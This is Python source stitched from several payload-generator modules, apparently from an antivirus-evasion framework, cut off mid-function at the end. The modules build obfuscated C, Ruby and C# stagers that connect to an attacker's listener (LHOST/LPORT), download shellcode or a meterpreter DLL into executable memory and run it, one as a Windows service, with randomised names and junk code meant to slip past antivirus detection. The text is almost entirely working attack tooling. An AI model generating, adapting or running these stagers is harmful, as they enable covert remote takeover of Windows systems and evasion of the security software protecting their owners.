wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, evasion_helpers.obfuscateNum(2,4), evasion_helpers.obfuscateNum(2,4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
code += "closesocket(%s);" %(my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# build the reverse_http uri checksum function
randchars = ''.join(random.sample("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",62))
characters_name = evasion_helpers.randomString()
string_var_name = evasion_helpers.randomString()
code += "char* %s(){" %(checksum_name)
code += "srand (time(NULL));int i;"
code += "char %s[] = \"%s\";" %(characters_name, randchars)
code += "char* %s = malloc(5); %s[4] = 0;" %(string_var_name, string_var_name)
code += "while (1<2){for(i=0;i<3;++i){%s[i] = %s[rand() %% (sizeof(%s)-1)];}" %(string_var_name, characters_name, characters_name)
code += "for(i=0;i<sizeof(%s);i++){ %s[3] = %s[i];" % (characters_name, string_var_name, characters_name)
code += "if (%s(%s) == 92) return %s; } } return 0;}\n" % (sumvalue_name,string_var_name,string_var_name)
# third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name);
code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" %(sock_name)
code += "%s.sin_port = htons(%s);" %(sock_name, evasion_helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" %(my_socket_name)
# build main() code
size_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
function_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
count_name = evasion_helpers.randomString()
request_buf_name = evasion_helpers.randomString()
buf_counter_name = evasion_helpers.randomString()
bytes_read_name = evasion_helpers.randomString()
# obfuscation stuff
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1,max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1,max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1,max_num_strings)
# main method code
code += "int main(int argc, char * argv[]) {"
code += "char * %s; int i;" %(buffer_name)
# obfuscation
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
# malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
# call the winsock init function
code += "%s();" %(winsock_init_name)
# obfuscation
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
# create our socket
code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
# malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
# build and send the HTTP request to the handler
code += "char %s[200];" %(request_buf_name)
code += "sprintf(%s, \"GET /%%s HTTP/1.1\\r\\nAccept-Encoding: identity\\r\\nHost: %s:%s\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\\r\\n\\r\\n\", %s());" %(request_buf_name, self.required_options["LHOST"][0], self.required_options["LPORT"][0], checksum_name)
code += "send(%s,%s, strlen( %s ),0);" %(my_socket_name, request_buf_name, request_buf_name)
code += "Sleep(300);"
# TODO: obfuscate/randomize the size of the page allocated
code += "%s = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name)
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# read the full server response into the buffer
code += "char * %s = %s;" % (buf_counter_name,buffer_name)
code += "int %s; do {" % (bytes_read_name)
code += "%s = recv(%s, %s, 1024, 0);" % (bytes_read_name, my_socket_name, buf_counter_name)
code += "%s += %s; }" % (buf_counter_name,bytes_read_name)
code += "while ( %s > 0 );" % (bytes_read_name)
# malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
# second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real code
code += "closesocket(%s); WSACleanup();" %(my_socket_name)
code += "((void (*)())strstr(%s, \"\\r\\n\\r\\n\") + 4)();" %(buffer_name)
# third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "return 0;}\n"
self.payload_source_code = code
return
def generate(self):
payload_code = "require 'rubygems';require 'win32/api';require 'net/http';include Win32\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X":
payload_code += 'require \'socket\'\n'
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += "def ch()\n"
#payload_code += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
#payload_code += "\t32.times do\n"
#payload_code += "\t\turi = chk.sample().join()\n"
#payload_code += "\t\tchk.sort_by {rand}.each do |x|\n"
#payload_code += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n"
#payload_code += "\t\tend\n"
#payload_code += "\tend\n"
payload_code += "\treturn \"WEZf\"\n"
payload_code += "end\n"
payload_code += "def ij(sc)\n"
payload_code += "\tif sc.length > 1000\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n"
payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n"
payload_code += "\tend\nend\n"
payload_code += "uri = URI.encode(\"http://%s:%s/#{ch()}\")\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payload_code += "uri = URI(uri)\n"
payload_code += "ij(Net::HTTP.get(uri))\n"
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
# randomize all our variable names, yo'
namespaceName = evasion_helpers.randomString()
className = evasion_helpers.randomString()
bytearrayName = evasion_helpers.randomString()
funcAddrName = evasion_helpers.randomString()
hThreadName = evasion_helpers.randomString()
threadIdName = evasion_helpers.randomString()
pinfoName = evasion_helpers.randomString()
rand_bool = evasion_helpers.randomString()
random_out = evasion_helpers.randomString()
num_tabs_required = 0
# get 12 random variables for the API imports
r = [evasion_helpers.randomString() for x in range(16)]
y = [evasion_helpers.randomString() for x in range(17)]
#required syntax at the beginning of any/all payloads
payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
payload_code += "namespace %s { class %s {\n" % (namespaceName, className)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern IntPtr VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] public static extern bool VirtualProtect(IntPtr %s, uint %s, uint %s, out uint %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, IntPtr %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11], r[12], r[13], r[14], r[15])
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])
payload_code += "static void Main() {\n"
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
num_tabs_required += 2
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % (bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + "IntPtr %s = VirtualAlloc(0, (UInt32)%s.Length, 0x3000, 0x04);\n" % (funcAddrName, bytearrayName)
payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
payload_code += '\t' * num_tabs_required + "uint %s;\n" %(random_out)
payload_code += '\t' * num_tabs_required + "bool %s = VirtualProtect(%s, (uint)0x1000, (uint)0x20, out %s);\n" %(rand_bool, funcAddrName, random_out)
payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (hThreadName)
# payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heap = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_var = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (bytearrayName, Shellcode)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, bytearrayName)
payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, bytearrayName, bytearrayName)
payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(rand_var)
payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var)
payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(hThreadName)
while (num_tabs_required != 0):
payload_code += '\t' * num_tabs_required + '}'
num_tabs_required -= 1
if self.required_options["USE_ARYA"][0].lower() == "y":
payload_code = encryption.arya(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
payload_code = ""
payload_code = "require 'rubygems';require 'uri';require 'win32/api';require 'net/https';require 'openssl';include Win32\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X":
payload_code += 'require \'socket\'\n'
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += "def ch()\n"
#payload_code += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
#payload_code += "\t32.times do\n"
#payload_code += "\t\turi = chk.sample(3).join()\n"
#payload_code += "\t\tchk.sort_by {rand}.each do |x|\n"
#payload_code += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n"
#payload_code += "\t\tend\n"
#payload_code += "\tend\n"
payload_code += "\treturn \"WEZf\"\n"
payload_code += "end\n"
payload_code += "def ij(sc)\n"
payload_code += "\tif sc.length > 1000\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n"
payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n"
payload_code += "\tend\nend\n"
payload_code += "uri = URI.parse(\"https://%s:%s/#{ch()}\")\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payload_code += "http = Net::HTTP.new(uri.host, uri.port)\n"
payload_code += "http.use_ssl = true\n"
payload_code += "http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n"
payload_code += "request = Net::HTTP::Get.new(uri.request_uri)\n"
payload_code += "response = http.request(request)\n"
payload_code += "ij(response.body)\n"
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
recv_all_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [
"#include <stdio.h>", "#include <stdlib.h>",
"#include <windows.h>", "#include <string.h>"
]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100, global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [
(randName1,
"char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
% (randName1)),
(randName2,
"char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
% (randName2))
]
random.shuffle(stringModFunctions)
# obsufcation - "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [
(randName1,
"char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
% (randName1, randVar1, stringModFunctions[0][0], randString1,
randVar1, randString1[25])),
(randName2,
"char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
% (randName2, randVar2, max_string_length, randVar3,
max_string_length, randVar2, evasion_helpers.randomString(50),
randVar3, evasion_helpers.randomString(50),
stringModFunctions[1][0], randVar2, randVar3)),
(randName3,
"char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
%
(randName3, randVar4, max_string_length,
evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = [
"#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
"#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"
]
for x in range(1, random.randint(1, 7)):
includes.append(fake_includes[x])
# obsufcation - shuffle up our real and fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
# real - service related headers (check the stub)
hStatusName = evasion_helpers.randomString()
serviceHeaders = [
"SERVICE_STATUS ServiceStatus;",
"SERVICE_STATUS_HANDLE %s;" % (hStatusName),
"void ServiceMain(int argc, char** argv);",
"void ControlHandler(DWORD request);"
]
random.shuffle(serviceHeaders)
code += "\n".join(serviceHeaders)
# obsufcation - string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# real - build the winsock_init function
wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
wVersionRequested_name, evasion_helpers.obfuscateNum(
2, 4), evasion_helpers.obfuscateNum(2, 4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
wVersionRequested_name, wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# real - build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
code += "closesocket(%s);" % (my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# obsufcation - second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# real - build recv_all function
my_socket_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
len_name = evasion_helpers.randomString()
code += "int %s(SOCKET %s, void * %s, int %s){" % (
recv_all_name, my_socket_name, buffer_name, len_name)
code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
code += "void * startb = %s;" % (buffer_name)
code += "while (rcAmwSVM < %s) {" % (len_name)
code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
my_socket_name, len_name)
code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;"
code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
punt_name, my_socket_name)
# obsufcation - third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# real - build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" % (
my_socket_name, punt_name, my_socket_name)
code += "%s = gethostbyname(\"%s\");" % (
target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" % (sock_name)
code += "%s.sin_port = htons(%s);" % (
sock_name,
evasion_helpers.obfuscateNum(
int(self.required_options["LPORT"][0]), 32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" % (my_socket_name)
# real - main() method for the service code
serviceName = evasion_helpers.randomString()
code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
serviceTableEntries = [
"ServiceTable[0].lpServiceName = \"%s\";" % (serviceName),
"ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
"ServiceTable[1].lpServiceName = NULL;",
"ServiceTable[1].lpServiceProc = NULL;"
]
random.shuffle(serviceTableEntries)
code += "\n".join(serviceTableEntries)
code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
# real - service status options for us to shuffle
serviceStatusOptions = [
"ServiceStatus.dwWin32ExitCode = 0;",
"ServiceStatus.dwCurrentState = SERVICE_START_PENDING;",
"ServiceStatus.dwWaitHint = 0;",
"ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;",
"ServiceStatus.dwServiceSpecificExitCode = 0;",
"ServiceStatus.dwCheckPoint = 0;",
"ServiceStatus.dwServiceType = SERVICE_WIN32;"
]
random.shuffle(serviceStatusOptions)
# real - serviceMain() code
code += "void ServiceMain(int argc, char** argv) {\n"
code += "\n".join(serviceStatusOptions)
code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" % (
hStatusName, serviceName)
code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" % (hStatusName)
code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
code += "SetServiceStatus (%s, &ServiceStatus);" % (hStatusName)
code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
# obsufcation - random variable names
size_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
function_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
count_name = evasion_helpers.randomString()
# obsufcation - necessary declarations
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1, max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1, max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1, max_num_strings)
# real - necessary declarations
code += "ULONG32 %s;" % (size_name)
code += "char * %s;" % (buffer_name)
code += "int i;"
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
code += "void (*%s)();" % (function_name)
# obsufcation - malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_1, char_array_name_1,
random.randint(max_string_length, global_max_string_length))
code += "%s();" % (winsock_init_name)
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)
# obsufcation - malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_2, char_array_name_2,
random.randint(max_string_length, global_max_string_length))
# real - receive the 4 byte size from the handler
code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
count_name, my_socket_name, size_name,
evasion_helpers.obfuscateNum(4, 2))
# real - punt the socket if something goes wrong
code += "if (%s != %s || %s <= 0) %s(%s);" % (
count_name, evasion_helpers.obfuscateNum(
4, 2), size_name, punt_name, my_socket_name)
# real - virtual alloc space for the meterpreter .dll
code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
buffer_name, size_name, evasion_helpers.obfuscateNum(5, 2))
# obsufcation - declare space for our 3 string obfuscation array
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# obsufcation - first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# real - check if the buffer received is null, if so punt the socket
code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
my_socket_name)
# real - prepend some buffer magic to push the socket number onto the stack
code += "%s[0] = 0xBF;" % (buffer_name)
# real- copy the 4 magic bytes into the buffer
code += "memcpy(%s + 1, &%s, %s);" % (
buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4, 2))
# obsufcation - malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_3, char_array_name_3,
random.randint(max_string_length, global_max_string_length))
# obsufcation - second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
# real - receive all data from the socket
code += "%s = %s(%s, %s + %s, %s);" % (
count_name, recv_all_name, my_socket_name, buffer_name,
evasion_helpers.obfuscateNum(5, 2), size_name)
code += "%s = (void (*)())%s;" % (function_name, buffer_name)
code += "%s();" % (function_name)
# obsufcation - third string obfuscation method (never called)
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
code += "} return; }\n"
# service control handler code
code += """void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
